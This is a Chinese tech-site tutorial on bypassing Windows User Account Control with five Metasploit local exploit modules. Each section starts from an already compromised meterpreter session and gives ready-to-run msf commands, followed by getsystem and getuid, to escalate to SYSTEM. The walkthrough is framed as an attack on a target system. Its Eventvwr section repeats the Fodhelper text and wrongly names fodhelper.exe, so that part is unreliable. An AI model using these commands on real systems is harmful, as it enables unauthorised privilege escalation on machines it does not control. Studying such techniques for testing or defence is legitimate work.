溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Metasploit中怎么繞過UAC

發(fā)布時間:2021-08-03 15:58:37 來源:億速云 閱讀:167 作者:Leah 欄目:編程語言

Metasploit中怎么繞過UAC,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

UAC簡介

什么是用戶帳戶控制?

UAC是在Windows Vista及更高版本操作系統(tǒng)中采用的一種控制機制,它以預見的方式阻止不必要的系統(tǒng)范圍更改。

換句話說,它是Windows的一項安全功能,支持你阻止任何對系統(tǒng)未經(jīng)授權(quán)的更改操作行為。UAC確保僅在管理員授權(quán)的情況下進行某些更改。如果管理員不允許更改,則不會執(zhí)行這些更改,并且Windows也不會發(fā)生任何的改變。

UAC是如何運作的?

一旦程序執(zhí)行涉及系統(tǒng)更改/特定任務就會觸發(fā)UAC。除非嘗試執(zhí)行它們的進程以管理員權(quán)限運行,否則這些操作都將被阻止。沒有管理員權(quán)限將無法執(zhí)行以下操作:

注冊表修改(如果注冊表項位于如HKEY_LOCAL_MACHINE下(因為它影響多個用戶),它將是只讀的)

加載設備驅(qū)動程序

DLL注入

修改系統(tǒng)時間(clock)

修改用戶帳戶控制設置(通過注冊表可以啟用/禁用它,但你需要正確的權(quán)限才能執(zhí)行該操作)

修改受保護的目錄(例如Windows文件夾,Program Files)

計劃任務(例如,以管理員權(quán)限自啟動)

注:UAC的作用并不是幫你阻止惡意軟件或識別程序是否為惡意程序,這主要取決于用戶。如果用戶以管理員權(quán)限執(zhí)行程序,UAC將提醒用戶并要求用戶提供確認。

5種繞過UAC的方法

首先,假設我們已獲取目標系統(tǒng)的meterpreter shell,并得到了一個meterpreter session 1。然后,我們鍵入以下命令提權(quán)并查看權(quán)限。

getsystem

getuid

如果你并未取得system/admin權(quán)限,那你就要想辦法繞過目標系統(tǒng)的UAC保護。

Windows提權(quán)UAC保護繞過

該模塊將通過進程注入,利用受信任的發(fā)布者證書繞過Windows UAC。 它將為我們生成另一個關(guān)閉UAC的shell(session 2)。

msf > use exploit/windows/local/bypassuac
msf exploit windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit

從圖片中可以看到meterpreter session 2已被打開,現(xiàn)在我們鍵入以下命令提權(quán)并查看權(quán)限。

getsystem
getuid

可以看到我們已將權(quán)限提升為了NT AUTHORITY\SYSTEM。現(xiàn)在如果你輸入“shell”命令,你將獲得具有管理員權(quán)限的命令提示符。

Metasploit中怎么繞過UAC

Windows提權(quán)UAC保護繞過(內(nèi)存注入)

該模塊將通過進程注入,利用受信任的發(fā)布者證書繞過Windows UAC。 它將為我們生成另一個關(guān)閉UAC的shell(session 2)。該模塊將直接運行在內(nèi)存中的反射DLL中,由于它并不觸碰硬盤,因此可以最大限度地降低被安全檢測的概率。但該模塊的使用需要選擇正確的架構(gòu)(對于SYSWOW64系統(tǒng)也是使用x64)。如果指定EXE::Custom DLL ,則應在單獨的進程中啟動payload后調(diào)用ExitProcess()。

msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit

從圖片中可以看到meterpreter session 2已被打開,現(xiàn)在我們鍵入以下命令提權(quán)并查看權(quán)限。

getsystem
getuid

可以看到我們已將權(quán)限提升為了NT AUTHORITY\SYSTEM?,F(xiàn)在如果你輸入“shell”命令,你將獲得具有管理員權(quán)限的命令提示符。

Metasploit中怎么繞過UAC

Windows提權(quán)UAC保護繞過(通過FodHelper注冊表項

該模塊通過在當前用戶配置單元下劫持注冊表中的特殊鍵,并插入將在啟動Windows fodhelper.exe應用程序時調(diào)用的自定義命令來繞過Windows 10 UAC。它將為我們生成另一個關(guān)閉UAC的shell。雖然該模塊修改了注冊表,但它會在調(diào)用payload后清除該鍵。相比之前的模塊,該模塊對架構(gòu)系統(tǒng)并無特別要求。如果指定EXE::Custom DLL,則應在單獨的進程中啟動payload后調(diào)用ExitProcess()。

msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit

從圖片中可以看到meterpreter session 2已被打開,現(xiàn)在我們鍵入以下命令提權(quán)并查看權(quán)限。

getsystem
getuid

 可以看到我們已將權(quán)限提升為了NT AUTHORITY\SYSTEM?,F(xiàn)在如果你輸入“shell”命令,你將獲得具有管理員權(quán)限的命令提示符。

Metasploit中怎么繞過UAC

Windows提權(quán)UAC保護繞過(通過Eventvwr注冊表項

該模塊通過在當前用戶配置單元下劫持注冊表中的特殊鍵,并插入將在啟動Windows fodhelper.exe應用程序時調(diào)用的自定義命令來繞過Windows 10 UAC。它將為我們生成另一個關(guān)閉UAC的shell。雖然該模塊修改了注冊表,但它會在調(diào)用payload后清除該鍵。相比之前的模塊,該模塊對架構(gòu)系統(tǒng)并無特別要求。如果指定EXE::Custom DLL,則應在單獨的進程中啟動payload后調(diào)用ExitProcess()。

msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit

從圖片中可以看到meterpreter session 2已被打開,現(xiàn)在我們鍵入以下命令提權(quán)并查看權(quán)限。

getsystem
getuid

 可以看到我們已將權(quán)限提升為了NT AUTHORITY\SYSTEM?,F(xiàn)在如果你輸入“shell”命令,你將獲得具有管理員權(quán)限的命令提示符。

Metasploit中怎么繞過UAC

Windows提權(quán)UAC保護繞過(COM處理程序劫持)

此模塊將通過在HKCU配置單元中,創(chuàng)建COM處理程序注冊表項來繞過Windows UAC。當加載某些高完整性進程時將會引用這些注冊表項,從而導致進程加載用戶控制的DLL。這些DLL中包含了可提升權(quán)限的payload。在調(diào)用payload后該模塊將會清除該鍵。該模塊的使用需要選擇正確的架構(gòu),但在當前低權(quán)限的Meterpreter session下架構(gòu)可以不同。如果指定EXE::Custom DLL,則應在單獨的進程中啟動payload后調(diào)用ExitProcess()。該模塊需要通過目標系統(tǒng)上的cmd.exe來調(diào)用目標二進制文件,因此如果限制cmd.exe訪問,則此模塊將無法正常運行。

msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit

從圖片中可以看到meterpreter session 2已被打開,現(xiàn)在我們鍵入以下命令提權(quán)并查看權(quán)限。

getsystem
getuid

 可以看到我們已將權(quán)限提升為了NT AUTHORITY\SYSTEM。現(xiàn)在如果你輸入“shell”命令,你將獲得具有管理員權(quán)限的命令提示符。

Metasploit中怎么繞過UAC

關(guān)于Metasploit中怎么繞過UAC問題的解答就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI